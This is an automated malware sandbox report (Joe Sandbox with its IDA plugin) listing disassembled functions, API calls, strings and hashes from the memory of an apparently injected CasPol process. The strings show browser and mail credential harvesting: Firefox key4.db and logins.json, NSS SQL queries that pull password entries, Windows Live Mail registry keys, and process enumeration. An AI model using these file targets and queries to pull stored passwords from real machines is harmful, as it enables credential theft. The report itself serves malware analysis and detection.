                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                    • API String ID: 633282248-1996832678
                                                                                                                                                                                                                    • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                                                                                    • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00406782
                                                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040686E
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 004068EC
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 004069B2
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 004069CA
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00406A4A
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • key4.db, xrefs: 00406756
                                                                                                                                                                                                                    • , xrefs: 00406834
                                                                                                                                                                                                                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                                                                    • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                                                    • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                                                    • API String ID: 3614188050-3983245814
                                                                                                                                                                                                                    • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                                                    • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                    • API String ID: 710961058-601624466
                                                                                                                                                                                                                    • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                                                                                                                    • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                    • API String ID: 3402215030-3842416460
                                                                                                                                                                                                                    • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                                                                                    • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                                                                      • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000), ref: 00407B6E
                                                                                                                                                                                                                      • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                                                                      • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                                                                      • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                                      • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F187
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                                                                                    • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                                                    • API String ID: 2003275452-3138536805
                                                                                                                                                                                                                    • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                                                                                    • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                                                                                    • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                                                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                                                                                    • API String ID: 1012775001-1343505058
                                                                                                                                                                                                                    • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                                                                                    • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strcmpi
                                                                                                                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                    • API String ID: 1439213657-1959339147
                                                                                                                                                                                                                    • Opcode ID: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                                                                                                                    • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00444612
                                                                                                                                                                                                                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00444668
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044467C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00444690
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004446B6
                                                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                                                    • String ID: salu
                                                                                                                                                                                                                    • API String ID: 3691931180-4177317985
                                                                                                                                                                                                                    • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                                                                                    • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll), ref: 00410047
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA,7570CFBC), ref: 00410060
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                    • API String ID: 2449869053-232097475
                                                                                                                                                                                                                    • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                                                    • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00443AD2
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443B2E
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443B4B
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                                                                                                                                      • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Salt, xrefs: 00443BA7
                                                                                                                                                                                                                    • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                                                                                                                    • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                                                                    • API String ID: 665470638-2687544566
                                                                                                                                                                                                                    • Opcode ID: 8fbf4a21aa37e580448f311c320075cae7563dc2be1a8724c18f17f23b444984
                                                                                                                                                                                                                    • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fbf4a21aa37e580448f311c320075cae7563dc2be1a8724c18f17f23b444984
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403ECE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403EE2
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403EF6
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403F17
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F33
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403F6A
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403F9B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F11
                                                                                                                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA6
                                                                                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F45
                                                                                                                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F95
                                                                                                                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00403F2D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                    • API String ID: 113626815-1670831295
                                                                                                                                                                                                                    • Opcode ID: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
                                                                                                                                                                                                                    • Instruction ID: 68eec6ff6ffa0e14b7f0c60be0e91221167be1d604113ab21f184662466f1ff3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0931A5B3D00258BEEB50DB54CC82FDE77ACEF54305F1001ABF548A3141DA78AB888B69
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                                                                                    • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                                                                      • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                                                                      • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                                                                      • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                                                                      • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                                                                                    • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040961C
                                                                                                                                                                                                                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                                                                                    • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                                                    • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                                                    • API String ID: 3259144588-3822380221
                                                                                                                                                                                                                    • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                                                                                                    • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040FE20), ref: 0040FFBF
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,7570CFBC), ref: 0040FFD8
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040FFE9
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040FFFA
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0041000B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0041001C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                                                                                                                    • Opcode ID: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
                                                                                                                                                                                                                    • Instruction ID: ef187524dc85a124578c70d9a5034bc1ef4a482c247f5fceb27d5c4ea416582d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15F06D30A007566AA7234B297C91BAB2EB89B4DB81715003BA400E6251DBE8D8C1CA6D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
